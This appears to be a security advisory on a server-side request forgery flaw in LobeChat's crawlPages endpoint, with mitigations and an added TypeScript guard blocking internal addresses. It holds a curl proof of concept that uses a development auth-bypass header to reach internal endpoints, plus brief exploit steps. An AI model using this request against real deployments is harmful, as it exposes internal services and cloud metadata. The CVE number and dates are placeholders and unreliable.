The CVE-2024-XXXX vulnerability in LobeChat's `tools.search.crawlPages` tRPC endpoint allows server-side request forgery (SSRF) because user-supplied URLs are not validated. When a client sends a request containing an array of URLs and selects the "naive" implementation (`impls: ["naive"]`), the server's crawler service passes these URLs directly to the `Crawler.crawl` method. The naive implementation, located in naive.ts, then calls `fetch(url)` with no check on whether the target is an internal network resource, such as localhost (127.0.0.1), a private IP range (e.g., 10.0.0.0/8), or a cloud metadata endpoint (169.254.169.254). The flow is: malicious client input -> tRPC router -> crawler service -> naive `fetch()` -> internal resource exposure. In development environments, authentication can be bypassed entirely with a specific header, which makes exploitation trivial.
Platform: LobeChat
Version: pre-patch
Vulnerability: SSRF
Severity: Critical
Date: 2024-XX-XX
Prediction: Patch 2024-09-30
What Undercode Says:
# PoC request against a local dev instance; the lobe-auth-dev-backend-api header bypasses authentication in development environments
curl -sS -X POST 'http://localhost:3010/trpc/tools/search.crawlPages' \
  -H 'Content-Type: application/json' \
  -H 'lobe-auth-dev-backend-api: 1' \
  --data '{"json":{"urls":["http://localhost:8889/internal-api"],"impls":["naive"]}}' | jq -r '.result.data.json.results[0].data.content' | jq .
// packages/web-crawler/src/crawImpl/naive.ts, L39-L45: the client-supplied URL reaches fetch() unchecked
const response = await fetch(url, {
  method: 'GET',
  signal: controller.signal,
  ...opts,
});
How to Exploit:
Bypass auth (dev).
Force naive impl.
Fetch internal endpoints.
Protection from this CVE:
Validate all user-supplied URLs (scheme and host) before they reach the crawler.
Block requests to internal IPs: loopback, private ranges and link-local addresses, including the cloud metadata endpoint.
Implement allow-lists of permitted crawl destinations.
Require authentication in production and never honour the dev bypass header there.
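As an added example of the controls listed above (this is not LobeChat's own code), the TypeScript guard below checks a crawl target before the naive implementation's fetch(url): it allow-lists http/https, rejects localhost, and blocks loopback, private, CGNAT, link-local (including 169.254.169.254) and IPv4-mapped addresses. All names (isBlockedAddress, rejectCrawlTarget, BLOCKED_V4 and the helpers) are this example's own; the resolved address list is supplied by the caller (e.g. from dns.lookup with { all: true }) so the check itself runs offline.

```typescript
// Added example, not LobeChat's code: guard to run before the naive crawler's fetch(url).
// IPv4 ranges a public crawler must never reach, as [network, prefixLength].
const BLOCKED_V4: Array<[string, number]> = [
  ["0.0.0.0", 8], ["10.0.0.0", 8], ["100.64.0.0", 10], ["127.0.0.0", 8],
  ["169.254.0.0", 16], // link-local, includes the 169.254.169.254 metadata service
  ["172.16.0.0", 12], ["192.168.0.0", 16],
];
// Dotted-decimal IPv4 -> unsigned 32-bit integer, or null if not dotted-decimal.
function v4ToInt(ip: string): number | null {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(ip);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  if (octets.some((o) => o > 255)) return null;
  return octets.reduce((acc, o) => ((acc << 8) + o) >>> 0, 0);
}
function isBlockedV4(n: number): boolean {
  return BLOCKED_V4.some(([net, bits]) => {
    const mask = (~0 << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((v4ToInt(net)! & mask) >>> 0);
  });
}
// True when an address literal is loopback, private, link-local, CGNAT or
// unspecified; anything unparseable is treated as blocked (fail closed).
export function isBlockedAddress(addr: string): boolean {
  const ip = addr.replace(/^\[|\]$/g, "").toLowerCase(); // URL.hostname keeps IPv6 brackets
  if (!ip.includes(":")) { const n = v4ToInt(ip); return n === null || isBlockedV4(n); }
  const dotted = /^::ffff:(\d+\.\d+\.\d+\.\d+)$/.exec(ip);            // IPv4-mapped, dotted form
  if (dotted) return isBlockedAddress(dotted[1]);
  const hex = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/.exec(ip);    // IPv4-mapped, hex form
  if (hex) return isBlockedV4(((parseInt(hex[1], 16) << 16) + parseInt(hex[2], 16)) >>> 0);
  if (ip === "::1" || ip === "::") return true;                       // loopback / unspecified
  const first = parseInt(ip.split(":")[0] || "0", 16);                // leading hextet
  return (first & 0xfe00) === 0xfc00 || (first & 0xffc0) === 0xfe80;  // fc00::/7, fe80::/10
}
// Pre-fetch check for one crawl target. `resolved` holds the addresses the hostname
// resolves to (e.g. from dns.lookup with { all: true }); it is passed in so the check
// runs offline. Returns null when the target is allowed, otherwise the rejection reason.
export function rejectCrawlTarget(raw: string, resolved: string[]): string | null {
  let url: URL;
  try { url = new URL(raw); } catch { return "malformed URL"; }
  if (url.protocol !== "http:" && url.protocol !== "https:") return `scheme ${url.protocol} not allowed`;
  const host = url.hostname; // WHATWG parsing already turns 2130706433 or 0x7f000001 into 127.0.0.1
  if (host === "localhost" || host.endsWith(".localhost")) return "localhost not allowed";
  const targets = host.startsWith("[") || v4ToInt(host) !== null ? [host] : resolved;
  if (targets.length === 0) return "hostname did not resolve";
  const bad = targets.find(isBlockedAddress);
  return bad === undefined ? null : `resolves to blocked address ${bad}`;
}
```

Connect to the address that passed the check rather than re-resolving the hostname, since a second lookup can return a different answer (DNS rebinding), and repeat the check on every redirect the crawler follows.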
Impact:
Internal API access.
Cloud metadata leakage.
Lateral movement foothold.
Sources:
Reported By: github.com